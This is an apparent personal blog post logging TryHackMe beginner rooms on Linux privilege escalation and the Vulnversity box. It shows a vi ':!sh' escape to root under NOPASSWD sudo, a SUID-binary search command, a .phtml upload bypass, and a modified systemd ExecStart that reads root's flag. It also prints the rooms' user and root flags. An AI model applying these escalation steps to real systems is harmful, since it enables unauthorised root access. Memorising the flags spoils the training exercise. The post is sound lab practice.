Monday is here again and we are back on THM!
As mentioned last week we are running through the Complete Beginner pathway on THM before it expires on 02/04/2025 which is a couple of days away!
We start today with the Common Linux Privesc room (which looks very similar to the room we did at the beginning of last week) just older.
Needed to type :!sh in Vi in order to get the root shell due to the NOPASSWD permissions on this file which was allowed to be ran as root.
Next we move on to the Linux PrivEsc room.
https://gtfobins.github.io/gtfobins/apache2ctl
These sections which we have just been done are very outdated and I can understandably conceive why these are no longer going to be available (as they are very old and just a bit shit).
Anyways, we are now on to the Vulnversity section of the pathway now!
http://10.10.108.18:3333/
http://10.10.108.18:3333/internal/
We found that the accepted file type extention was .phtml.
User Flag – 8bd7992fbe8a6ad22a63361004cfcedb
find / -user root -perm -4000 -exec ls -ldb {}
Edit the [ExecStart=/bin/sh -c “id > /tmp/output”] toExecStart=/bin/sh -c “cat /root/root.txt > /tmp/output”
Root Flag – a58ff8579f0a9270368d33a9966c7fd5
Until next time & don’t sleepwalk through life!
Bayi